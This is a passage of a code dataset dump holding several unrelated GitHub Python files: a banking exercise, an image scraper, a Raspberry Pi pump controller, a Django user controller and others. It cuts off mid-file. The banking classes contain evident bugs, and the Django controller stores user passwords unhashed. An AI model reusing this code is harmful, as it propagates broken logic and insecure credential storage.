items.append((\"journal\", \"journal (systemd)\"))\n else:\n items.append((\"messages\", \"/var/log/messages\"))\n\n return items\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/setup/core/support_page.py","file_name":"support_page.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"}
+{"seq_id":"40300518138","text":"\r\nfrom mimetypes import init\r\n\r\n\r\nclass Bank :\r\n bankID = -1\r\n allBanks = set([])\r\n def __init__(self,bankFullName,bankAbbrivation):\r\n self.bankFullName = bankFullName\r\n self.bankAbbrivation = bankAbbrivation\r\n bankID+=1\r\n self.bankID = bankID\r\n\r\n @staticmethod\r\n def findBank(bankAbbrivation):\r\n for i in Bank.allBanks:\r\n if i.bankAbbrivation == bankAbbrivation:\r\n return True,i\r\n return False\r\n\r\n @staticmethod\r\n def createNewBank(bankName,bankAbbrivation):\r\n newBank = Bank(bankName,bankAbbrivation)\r\n if(Bank.allBanks.add(newBank)==False):\r\n print(\"Bank already exits!!\")\r\n return False\r\n return True\r\n\r\nclass Account:\r\n accountNumber = 0\r\n def __init__(self,bank):\r\n self.accountNumber = Account.accountNumber\r\n self.bank = bank\r\n self.balance = 1000\r\n def isAccountExists(self,bankAbbrivation):\r\n return self.bank.bankAbbrivation == bankAbbrivation\r\n\r\n def displayAccountBalance(self):\r\n print(\"Account Balance is \"+self.balance)\r\n\r\n def isSufficientBalace(self,amount):\r\n return self.balance>=amount\r\n\r\n def updateAccountBalance(self,amount,operation):\r\n if operation==\"Add\":\r\n self.balance+=amount\r\n else:\r\n self.balance-=amount\r\n return\r\n\r\n @staticmethod\r\n def createNewAccount(bankAbbrivation):\r\n isBankExits,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExits:\r\n print(\"The given bank name doest not exits!!\")\r\n return False\r\n newAccount = Account(bankObj)\r\n return newAccount\r\n\r\n\r\nclass Customer:\r\n customerID = -1\r\n allCustomers = []\r\n def __init__(self,firstName,lastName,totalBalance,userName):\r\n customerID+=1\r\n self.customerID = Customer.customerID\r\n self.firstName = firstName\r\n self.lastName = lastName\r\n self.totalBalance = totalBalance\r\n self.accounts = []\r\n self.userName = userName\r\n \r\n @staticmethod\r\n def findCustomer(self,userName):\r\n for customer in Customer.allCustomers:\r\n if customer.userName == userName:\r\n return True,customer\r\n \r\n return False\r\n \r\n\r\n\r\n def findAccount(self,bankAbbrivation):\r\n for account in self.accounts:\r\n if account.bank.bankAbbrivation == bankAbbrivation:\r\n return True,account\r\n return False\r\n \r\n def createNewAccount(self,bankAbbrivation):\r\n isAccountExists,_ = self.findAccount(bankAbbrivation)\r\n if isAccountExists:\r\n print(\"account already exits in this bank!! \")\r\n return \r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if isBankExists :\r\n return \r\n newAccount = Account.createNewAccount(bankAbbrivation)\r\n self.accounts.append(newAccount)\r\n return True,newAccount\r\n\r\n def deposit(self,bankAbbrivation,amount):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be deposited as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n account.updateAccountBalance(amount,\"Add\")\r\n print(\"Amount has been deposited in your accout successfully\")\r\n self.__updateTotalBalace()\r\n return True\r\n print(\"cannot deposit the amount as the account does not exits\")\r\n return False\r\n\r\n def Withdraw(self,amount,bankAbbrivation):\r\n isBankExists,bankObj = Bank.findBank(bankAbbrivation)\r\n if not isBankExists:\r\n print(\"Amount cannot be withdraw as the bank does not exits\")\r\n return \r\n isAccountExits,account = self.findAccount(bankAbbrivation)\r\n if isAccountExits:\r\n if account.isSufficientBalace(amount):\r\n account.updateAccountBalance(amount,\"subtract\")\r\n print(\"Amount has been withdrawn from your account successfully!!\")\r\n self.__updateTotalBalace()\r\n return True\r\n\r\n print(\"Insufficient account balance!\")\r\n return \r\n print(\"cannot withdraw the amount as the account does not exits\")\r\n return False\r\n \r\n def transferAmount(self,creditCustomerUserName,creditCustomerBankName,debitCustomerBankName,amount):\r\n if Customer.findCustomer(creditCustomerUserName) and Customer.findCustomer(debitCustomerBankName):\r\n customerObj = Customer.findCustomer(creditCustomerBankName)\r\n self.Withdraw(debitCustomerBankName,amount)\r\n customerObj.deposit(creditCustomerUserName,amount)\r\n return True\r\n print(\"cannot transfer the amount\")\r\n return False\r\n\r\n def selfTransfer(self,creditBankName,debitBankName,amount):\r\n if Bank.findBank(creditBankName) and Bank.findBank(debitBankName):\r\n self.Withdraw(debitBankName,amount)\r\n self.deposit(creditBankName,amount)\r\n return True\r\n print(\"cannot transfer the amount!\")\r\n return False\r\n\r\n def __updateTotalBalace(self):\r\n self.totalBalance = 0\r\n for account in self.accounts:\r\n self.totalBalance+=account.balance\r\n return self.totalBalance\r\n \r\n\r\n def displayBalance(self):\r\n print(self.firstName+\" your account balance is \"+self.totalBalance)\r\n for account in self.accounts:\r\n account.displayBalance()\r\n \r\n\r\n","repo_name":"Sahil8317/Forcepoint-Training-Assignments","sub_path":"BankingApp.py","file_name":"BankingApp.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22208067626","text":"from bs4 import *\nfrom pathlib import PurePath\nimport requests\nimport sys\nimport os\n\nclass bcolors:\n OK = \"\\033[92m\"\n WARNING = \"\\033[93m\"\n FAIL = \"\\033[91m\"\n RESET = \"\\033[0m\"\n\ndef get_links(url, url_links, dominio):\n try:\n response = requests.get(url)\n except:\n print(bcolors.FAIL + \"Error: invalid URL\" + bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n links = soup.findAll('a')\n for tag in links:\n cut = tag.get('href')\n if cut != None:\n if dominio in cut:\n url_links.append(cut)\n elif cut.startswith('/') == True:\n cut = \"https://\" + dominio + cut\n url_links.append(cut)\n return (url_links)\n \ndef get_images(url_links, dominio):\n url_images = []\n for link in url_links:\n try:\n response = requests.get(link)\n except:\n print(bcolors.FAIL + \"Error: invalid URsL \" + link +bcolors.RESET)\n exit()\n soup = BeautifulSoup(response.text, 'html.parser')\n images = soup.findAll('img')\n for tag in images:\n cut = tag.get('src')\n if cut != None and len(cut) > 0:\n if cut.endswith(\".png\") or cut.endswith(\".gif\") or cut.endswith(\".bmp\") or cut.endswith(\".jpg\" or cut.endswith(\".jpeg\")):\n if cut.startswith('//') == True:\n cut = cut[2:]\n if dominio in cut:\n if cut.startswith(\"https\") == False:\n cut = \"https://\" + cut\n url_images.append(cut)\n elif cut.startswith('/') and \".com\" != cut:\n cut = \"https://\" + dominio + cut\n url_images.append(cut)\n return url_images\n\ndef check(rec):\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n url_images = []\n url_links = []\n \n if (len(sys.argv) == 1):\n print(bcolors.FAIL + \"Error: please insert a URL\" + bcolors.RESET)\n exit()\n elif \"-r\" != opts:\n url = sys.argv[len(sys.argv) - 1]\n if url.endswith(\"/\") == False:\n url = url + '/'\n if url.startswith(\"http\") == False:\n url = \"https://\" + url\n\n dominio = url[url.index('/') + 2:-1]\n \n if rec != 0 and len(url_links) < int(rec):\n x = 0\n url_links = get_links(url, url_links, dominio)\n while len(url_links) < int(rec):\n url_links = get_links(url_links[x], url_links, dominio)\n x += x\n result = []\n for link in url_links:\n if link not in result:\n result.append(link)\n if len(result) < int(rec):\n print(bcolors.WARNING + \"Warning: has requested recursion \" + str(rec) + \" but only \" + str(len(result)) + \" urls with the supplied domain are valid\" + bcolors.RESET)\n url_links = result\n else:\n url_links.append(url)\n url_images = get_images(url_links, dominio)\n return url_images\n\ndef clean_folder(path, content):\n for file in content:\n os.remove(path + '/' + file)\n\ndef download_image(folder, url, name):\n path = os.getcwd() + '/'+ folder\n if os.path.exists(path) == False:\n os.mkdir(folder)\n name = folder + '/' + name\n f = open(name,'wb')\n try:\n response = requests.get(url)\n f.write(response.content)\n except:\n print(bcolors.WARNING + \"Invalid URL \", url + bcolors.RESET)\n return 0\n f.close()\n return 1\n\ndef main():\n opts = [opt for opt in sys.argv[1:]]\n if \"-p\" in opts:\n try:\n folder = opts[opts.index(\"-p\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid folder\" + bcolors.RESET)\n exit()\n if folder.startswith(\"-\"):\n print(bcolors.FAIL + \"Error: invalid name for folder\" + bcolors.RESET)\n exit()\n else:\n folder = \"data\"\n\n if \"-l\" in opts:\n if \"-r\" not in opts:\n print(bcolors.FAIL + \"Error: \\\"-l\\\" specified but no recursivity \\\"-r\\\"\" + bcolors.RESET)\n exit()\n else:\n try:\n rec = opts[opts.index(\"-l\") + 1]\n except:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n if rec.isnumeric() == False:\n print(bcolors.FAIL + \"Error: invalid argument for \\\"-l\\\"\" + bcolors.RESET)\n exit()\n elif \"-r\" in opts:\n rec = 5\n else:\n rec = 0\n\n url_images = check(rec)\n if url_images == None:\n exit()\n else:\n x = 0\n path = os.getcwd() + '/' + folder\n if os.path.exists(path) == True:\n content = os.listdir(path)\n clean_folder(path, content)\n for image in url_images:\n extension = image[image.rfind('.'):len(image)]\n if \".jpeg\" in extension:\n extension = \".jpeg\"\n else:\n extension = extension[0:4]\n x += download_image(folder, url_images[x], \"image\" + str(x) + extension)\n if x == rec:\n break\n print(bcolors.OK + str(x) + bcolors.RESET + \" images downloaded successfully\")\n\nif __name__ == '__main__':\n main()","repo_name":"veaz/arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":5389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4860332946","text":"\"\"\"Exemplo de Pool nativo\"\"\"\n\nfrom multiprocessing import Pool\nfrom os import getpid\nfrom pprint import pprint\n\n\ndef soma_2(x):\n return x + 2, getpid()\n\n\nif __name__ == '__main__':\n\n workers = Pool(5)\n\n # Sync\n # result = workers.map(soma_2, range(100))\n # pprint(result)\n\n # Async\n result = workers.map_async(soma_2, range(100))\n result.wait()\n pprint(result.get())\n","repo_name":"joscelino/multiprocessamento_python","sub_path":"multi_processos/exemplos/app4.py","file_name":"app4.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3022298988","text":"# File: wordChart.py\r\n# Kevin Nakashima\r\n# Takes a text file\r\n# Program will count the number of times each word occurs in file\r\n# Program will print out a histogram of words and frequencies\r\n#==============================================================================\r\n# RESOURCES\r\n# http://programminghistorian.org/lessons/counting-frequencies\r\n# http://moderndata.plot.ly/generate-html-reports-with-python-pandas-and-plotly/\r\n# https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions\r\n# https://www.tutorialspoint.com/python/python_dictionary.htm\r\n# http://help.plot.ly/embed-graphs-in-websites/\r\n# IMPORTS\r\n\r\n\r\n# CLASS DECLARATIONS\r\nclass report():\r\n __slots__ = ['word','wordlist','fName','shortest','longtest','most','least']\r\n def __init__(self, fName):\r\n self.word = \"\"\r\n self.wordlist = {}\r\n self.fName = fName\r\n self.shortest = \"\"\r\n self.longest = \"\"\r\n self.most = \"\"\r\n self.least = \"\"\r\n \r\n def addWord(self):\r\n self.word = self.word.lower()\r\n if len(self.word) == 1:\r\n self.shortest = self.word\r\n if len(self.word) > len(self.longest):\r\n self.longest = self.word\r\n if self.word in self.wordlist:\r\n #if dictionary has word, increment frequency\r\n self.wordlist[self.word] = self.wordlist[self.word] + 1\r\n else:#if not in dictionary, create\r\n self.wordlist[self.word] = 1\r\n #reset word\r\n self.word = \"\"\r\n\r\n def mostLeast(self):\r\n self.most = max(self.wordlist, key=self.wordlist.get)\r\n self.least = min(self.wordlist, key=self.wordlist.get)\r\n\r\n \r\n def writeReport(self, f):\r\n self.mostLeast()\r\n outFile = open(f + \".html\", 'w')\r\n outFile.write('''\\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(self.fName + \"Analysis\")\r\n outFile.write(''' \\n\r\n \\n\r\n \\n\r\n \\n\r\n \\n''')\r\n outFile.write(\"Longest Word: {}
\".format(self.longest))\r\n outFile.write(\"Shortest Word: {}
\".format(self.shortest))\r\n outFile.write(\"Word used most: {}
\".format(self.most))\r\n outFile.write(\"Word used least: {}
\".format(self.least))\r\n for keys, values in self.wordlist.items():\r\n line = \"{} : {}
\".format(keys, values)\r\n outFile.write(line)\r\n outFile.write(\"\\n\\\r\n \")\r\n #close output File\r\n outFile.close()\r\n\r\ndef main():\r\n #variable declarations\r\n r = report(input(\"Enter the file name: \"))\r\n #open file to read\r\n with open(r.fName) as f:\r\n while True:\r\n #read one character at a time\r\n c = f.read(1) \r\n #if not alphanumeric, ignore\r\n if c.isalpha():\r\n r.word += c\r\n elif c == ' ' or c == '\\n':\r\n r.addWord()\r\n elif not c:\r\n r.addWord()\r\n break\r\n\r\n f = r.fName.split('.')\r\n r.writeReport(f[0])\r\n \r\nmain()\r\n","repo_name":"Sirly/practice_python_programs","sub_path":"wordChart.py","file_name":"wordChart.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"75084273690","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\ndef digital_for_duration(pin, duration):\n if pin == 21: # If the chosen pin is for the Washing pump\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.HIGH) # Open the Valve\n print(\"Valve (Pin 20) opened.\")\n \n elif pin == 23: # If the chosen pin is for the Sample water\n GPIO.setup(20, GPIO.OUT) # Set up the Valve & pump-out pin\n GPIO.output(20, GPIO.LOW) # Close the Valve\n print(\"Valve (Pin 20) closed.\")\n \n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\n print(f\"Pin {pin} turned on for {duration} seconds.\")\n \n try:\n time.sleep(duration)\n except KeyboardInterrupt:\n print(f\"\\nInterrupted! Turning off pin {pin} immediately.\")\n \n GPIO.output(pin, GPIO.LOW)\n print(f\"Pin {pin} turned off.\")\n\ndef pwm_for_duration(pin, duty_cycle, duration):\n GPIO.setup(pin, GPIO.OUT)\n \n pwm = GPIO.PWM(pin, 100) # Frequency is hardcoded to 100Hz\n \n try:\n pwm.start(duty_cycle)\n print(f\"Started PWM on pin {pin} with 100Hz frequency and {duty_cycle}% duty cycle.\")\n print(f\"It will run for {duration} seconds or you can press Ctrl+C to exit early.\")\n time.sleep(duration)\n except KeyboardInterrupt:\n print(\"\\nExiting early due to user interrupt.\")\n finally:\n pwm.stop()\n print(f\"Stopped PWM on pin {pin}.\")\n\ndef main():\n try:\n while True:\n print(\"\\nMenu:\")\n print(\"1. Digital Output\")\n print(\"2. PWM Output\")\n print(\"3. Exit\")\n \n choice = input(\"Enter your choice: \")\n \n if choice == \"1\":\n print(\"\\nDigital Output Options:\")\n print(\"1. Sample water (Pin 23)\")\n print(\"2. Washing pump (Pin 21)\")\n print(\"3. Mixing pump (Pin 16)\")\n print(\"4. Valve (Pin 20)\")\n \n digital_choice = input(\"Enter your choice: \")\n if digital_choice == \"1\":\n pin = 23\n elif digital_choice == \"2\":\n pin = 21\n elif digital_choice == \"3\":\n pin = 16\n elif digital_choice == \"4\":\n pin = 20\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duration = float(input(\"Enter duration in seconds: \"))\n digital_for_duration(pin, duration)\n \n elif choice == \"2\":\n print(\"\\nPWM Output Options:\")\n print(\"1. LED (Pin 12, max 40%)\")\n print(\"2. Dosing pump (Pin 13, max 40%)\")\n \n pwm_choice = input(\"Enter your choice: \")\n if pwm_choice == \"1\":\n pin = 12\n elif pwm_choice == \"2\":\n pin = 13\n else:\n print(\"Invalid choice. Returning to main menu.\")\n continue\n\n duty_cycle = float(input(\"Enter duty cycle (0-40): \"))\n if duty_cycle > 40:\n print(\"Duty cycle exceeds maximum limit. Setting to 40%.\")\n duty_cycle = 40\n\n duration = float(input(\"Enter duration in seconds: \"))\n pwm_for_duration(pin, duty_cycle, duration)\n \n elif choice == \"3\":\n print(\"Exiting program.\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\n except KeyboardInterrupt:\n print(\"\\nProgram interrupted by user. Exiting.\")\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"timothymoniaga/raspi-ph","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"10068552328","text":"import os\nimport re\nimport sys\nfrom packaging import version\nfrom subprocess import Popen, PIPE\nfrom poco.services.file_utils import FileUtils\nfrom poco.services.state import StateHolder\nfrom .console_logger import ColorPrint\nfrom datetime import *\n\n\nclass EnvironmentUtils:\n\n @staticmethod\n def get_variable(key, default=None):\n return os.environ.get(key, default)\n\n @staticmethod\n def set_variable(key, value):\n os.environ[key] = value\n\n @staticmethod\n def set_poco_uid_and_gid():\n if os.name == \"posix\":\n EnvironmentUtils.set_variable(\"POCO_UID\", str(os.getuid()))\n EnvironmentUtils.set_variable(\"POCO_GID\", str(os.getgid()))\n\n @staticmethod\n def check_docker():\n p = Popen(\"docker version -f {{.Server.Version}}\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message='Docker not running.')\n if str(out).split(\".\")[0] < str(17):\n ColorPrint.exit_after_print_messages(message='Please upgrade Docker to version 17 or above')\n\n @staticmethod\n def check_kubernetes():\n EnvironmentUtils.check_base(command=\"kubectl version --short\", message_head=\"Kubernetes\")\n\n @staticmethod\n def check_helm():\n EnvironmentUtils.check_base(command=\"helm version -s --short\", message_head=\"Helm\")\n\n @staticmethod\n def check_base(command, message_head):\n p = Popen(command, stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0 or len(out) == 0:\n ColorPrint.exit_after_print_messages(message=str(err).strip())\n ColorPrint.print_with_lvl(message=message_head + \"\\n \" + str(out).strip(), lvl=1)\n\n @staticmethod\n def check_version(current_version, is_beta_tester, is_force_check):\n if (EnvironmentUtils.need_check() or is_force_check):\n # check pip\n p = Popen(\"pip install poco==\", stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n if not len(err) == 0:\n newest_version = EnvironmentUtils.parse_version(str(err), is_beta_tester)\n else:\n # maybe installed from source\n return\n if version.parse(current_version) < version.parse(newest_version):\n ColorPrint.print_warning(\"New version of poco is available. \\n \"\n \"Please upgrade with: pip install poco==\" + newest_version)\n elif is_force_check:\n ColorPrint.print_warning(\"Poco is up to date\")\n\n @staticmethod\n def parse_version(pip_content, is_beta_tester):\n \"\"\"PIP response variations and expected versions:\n * '(from versions: 0.0.1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1.dev1,0.0.2)' - noDev: 0.0.2 isDev: 0.0.2\n * '(from versions: 0.0.1,0.0.2.dev1)' - noDev: 0.0.1 isDev: 0.0.2.dev1\n\n not dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\n is dev support : ^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\n \"\"\"\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+)[\\\\),].*$\"\n if is_beta_tester:\n version_expression = \"^.*\\\\(from versions:.*(\\\\d+.\\\\d+.\\\\d+(\\\\.dev\\\\d+)?)[\\\\),].*$\"\n matches = re.findall(version_expression, pip_content)\n\n pre_ver = matches[0] if len(matches) > 0 else \"0.0.0\"\n return pre_ver[0] if type(pre_ver) is tuple else pre_ver\n\n @staticmethod\n def decode(text_string):\n if sys.version_info[0] == 3:\n return text_string.decode(\"utf-8\")\n return text_string\n\n @staticmethod\n def need_check():\n directory = StateHolder.home_dir\n filename = \"latest_update_check_date\"\n latest_check_date = FileUtils.get_file_content(directory, filename)\n today = str(date.today())\n if (latest_check_date < today):\n FileUtils.write_to_file(directory, filename, today)\n return True\n return False\n","repo_name":"shiwaforce/poco","sub_path":"poco/services/environment_utils.py","file_name":"environment_utils.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"}
+{"seq_id":"16157232832","text":"from django.contrib.auth.models import User\nfrom ..serializers import UsuarioSerializer\nfrom ..models import Puesto, Usuario, Rol, EstatusUsuario, Idioma\n\nclass ControllerUsuario:\n def crearUsuario(request):\n datosUsuario = request.data\n print(request.data)\n print(request)\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username)\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n \n UsuarioNuevo = Usuario.objects.create(\n username =username,\n p_nombre = datosUsuario['p_nombre'],\n p_apellido = datosUsuario['p_apellido'],\n s_apellido= datosUsuario['s_apellido'],\n email= datosUsuario['email'],\n telefono = datosUsuario['telefono'], \n password = datosUsuario['password'],\n es_activo = datosUsuario['es_activo'],\n rol = rol,\n puesto = puesto,\n idioma = idioma,\n estatus = estatus,\n )\n\n userNuevo = User.objects.create(\n username = username,\n email = datosUsuario['email'],\n password = datosUsuario['password'],\n )\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return {\"estatus\":\"Ok\", 'nuevo_usuario': UsuarioNuevo.username}\n \n def listarUsuario(id_usuario=None):\n if id_usuario:\n try:\n queryset = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n queryset = Usuario.objects.all()\n serializer = UsuarioSerializer(queryset, many=True)\n return serializer.data\n\n def verPerfil(p_nombre=None):\n if p_nombre:\n try:\n queryset = Usuario.objects.get(p_nombre=p_nombre)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n serializer = UsuarioSerializer(queryset)\n return serializer.data\n else:\n return ({'result': 'Ingrese el nombre de usuario'})\n\n\n def modificarUsuario(request,id_usuario=None):\n if id_usuario:\n datosUsuario = request.data\n try:\n usuarioModificar = Usuario.objects.get(id_usuario=id_usuario)\n except Usuario.DoesNotExist:\n return ({'result': 'No se encontró el usuario deseado'})\n try:\n #usuarioRegistra = Usuario.objects.get(p_nombre=\"administrador\") \n rol = Rol.objects.get(id_rol=datosUsuario['rol'])\n puesto = Puesto.objects.get(id_puesto=datosUsuario['puesto'])\n idioma = Idioma.objects.get(id_idioma=datosUsuario['idioma'])\n estatus = EstatusUsuario.objects.get(id_estatus=datosUsuario['estatus'])\n username = datosUsuario['username']\n \n # if usuarioRegistra.rol.scope.id_scope >= rol.scope.id_scope:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n # if usuarioRegistra.rol.tipo_rol.id_tipo_rol >= rol.tipo_rol.id_tipo_rol:\n # return {\"Error\":\"No cuentas con los privilegios para registrar al usuario\"}\n\n usuario_duplicado = Usuario.objects.filter(username=username).exclude(id_usuario=id_usuario)\n\n if usuario_duplicado.exists():\n return {\"Error\":\"El username ya existe en la base de datos\"}\n \n usuarioModificar.username = username\n usuarioModificar.p_nombre = datosUsuario['p_nombre']\n usuarioModificar.p_apellido = datosUsuario['p_apellido']\n usuarioModificar.s_apellido= datosUsuario['s_apellido']\n usuarioModificar.email= datosUsuario['email']\n usuarioModificar.telefono = datosUsuario['telefono'] \n usuarioModificar.password = datosUsuario['password']\n usuarioModificar.es_activo = datosUsuario['es_activo']\n usuarioModificar.rol = rol\n usuarioModificar.puesto = puesto\n usuarioModificar.idioma = idioma\n usuarioModificar.estatus = estatus\n \n usuarioModificar.save()\n \n except Exception:\n return {\"estatus\":\"Error\"}\n\n return {\"estatus\":\"Ok\", 'Usuario_modificado': usuarioModificar.username}\n else: \n return {\"result\":\"Ingrese el Id del usuario que desea modificar\"}","repo_name":"raquelnany/ACTIVO_DJANGO_DOCKER_PROGRES","sub_path":"app/core/controller/ControllerUsuario.py","file_name":"ControllerUsuario.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"21785016887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 29/06/18\n\n@author: HarryS\n\"\"\"\n\nfrom scanning_functions import *\n\n\ndef run_scan(param_dict, args):\n \"\"\"\n Given points defined in param_dict run create run point directories\n and populate with Herwig .in file and params.dat file.\n\n Parameters\n ----------\n\n param_dict: dict\n Dictionary with parameter names as keys each containing another\n dictionary with keys 'range' and 'values'.\n\n args: argparse.Namespace object\n Argparse object with attributes containing command line options.\n\n Returns\n -------\n\n None\n\n \"\"\"\n\n # Read in run card template files\n template = read_template_file(args.template_file)\n\n make_directory(args.out_dir)\n for run_point in range(args.num_points):\n # Run point directories are inside the output directory and hold\n # the necessary files to run Herwig with the param_dict associated\n # with that point\n run_point_path = make_run_point_directory(run_point, args.out_dir)\n\n # Write params.dat file inside run point directory. This is purely to\n # record what the param_dict are at this run point\n write_param_file(param_dict, run_point_path, run_point)\n\n # Write run card template files formatted with parameter values\n write_template_files(template, param_dict, run_point,\n run_point_path, args.param_file)\n\n # Write all sampled points and their run points to a .dat file\n write_sampled_points(args.out_dir)\n","repo_name":"hsaunders1904/contur","sub_path":"AnalysisTools/contur/contur/Scanning/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8444128579","text":"\"\"\"\"\nCode is modified based on : https://github.com/lxtGH/PFSegNets\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Nets.SGFANet.mynn import Norm2d\nfrom Nets.ground_transformer import GroundTrans\n\n\ndef point_sample(input, point_coords, **kwargs):\n \"\"\"\n A wrapper around :function:`torch.nn.functional.grid_sample` to support 3D point_coords tensors.\n Unlike :function:`torch.nn.functional.grid_sample` it assumes `point_coords` to lie inside\n [0, 1] x [0, 1] square.\n\n Args:\n input (Tensor): A tensor of shape (N, C, H, W) that contains features map on a H x W grid.\n point_coords (Tensor): A tensor of shape (N, P, 2) or (N, Hgrid, Wgrid, 2) that contains\n [0, 1] x [0, 1] normalized point coordinates.\n\n Returns:\n output (Tensor): A tensor of shape (N, C, P) or (N, C, Hgrid, Wgrid) that contains\n features for points in `point_coords`. The features are obtained via bilinear\n interplation from `input` the same way as :function:`torch.nn.functional.grid_sample`.\n \"\"\"\n add_dim = False\n if point_coords.dim() == 3:\n add_dim = True\n point_coords = point_coords.unsqueeze(2)\n output = F.grid_sample(input, 2.0 * point_coords - 1.0, **kwargs)\n if add_dim:\n output = output.squeeze(3)\n return output\n\n\ndef get_uncertain_point_coords_on_grid(uncertainty_map, num_points):\n \"\"\"\n Find `num_points` most uncertain points from `uncertainty_map` grid.\n\n Args:\n uncertainty_map (Tensor): A tensor of shape (N, 1, H, W) that contains uncertainty\n values for a set of points on a regular H x W grid.\n num_points (int): The number of points P to select.\n\n Returns:\n point_indices (Tensor): A tensor of shape (N, P) that contains indices from\n [0, H x W) of the most uncertain points.\n point_coords (Tensor): A tensor of shape (N, P, 2) that contains [0, 1] x [0, 1] normalized\n coordinates of the most uncertain points from the H x W grid.\n \"\"\"\n R, _, H, W = uncertainty_map.shape\n h_step = 1.0 / float(H)\n w_step = 1.0 / float(W)\n\n num_points = min(H * W, num_points)\n point_indices = torch.topk(uncertainty_map.view(R, H * W), k=num_points, dim=1)[1]\n point_coords = torch.zeros(R, num_points, 2, dtype=torch.float, device=uncertainty_map.device)\n point_coords[:, :, 0] = w_step / 2.0 + (point_indices % W).to(torch.float) * w_step\n point_coords[:, :, 1] = h_step / 2.0 + (point_indices // W).to(torch.float) * h_step\n return point_indices, point_coords\n\n\nclass PointFlowModuleWithCornerEdgeSampling(nn.Module):\n def __init__(self, in_planes, dim=64, matcher_kernel_size=3,\n edge_points=32, corner_points=32, gated=False, gt_tag=True):\n super(PointFlowModuleWithCornerEdgeSampling, self).__init__()\n self.dim = dim\n self.down_h = nn.Conv2d(in_planes, dim, 1)\n self.down_l = nn.Conv2d(in_planes, dim, 1)\n self.softmax = nn.Softmax(dim=-1)\n self.edge_points = edge_points\n self.corner_points = corner_points\n self.gated = gated\n self.gt_tag = gt_tag\n if self.gt_tag:\n self.gt = GroundTrans(in_channels=in_planes, dimension=2)\n print(\"Ground Transformer\")\n print(f\"edge points:{self.edge_points},corner points:{self.corner_points}\")\n if self.gated:\n print(\"weight gate is added\")\n self.channel_gate = nn.Sequential(nn.Linear(in_planes, in_planes), nn.Dropout(0.1), 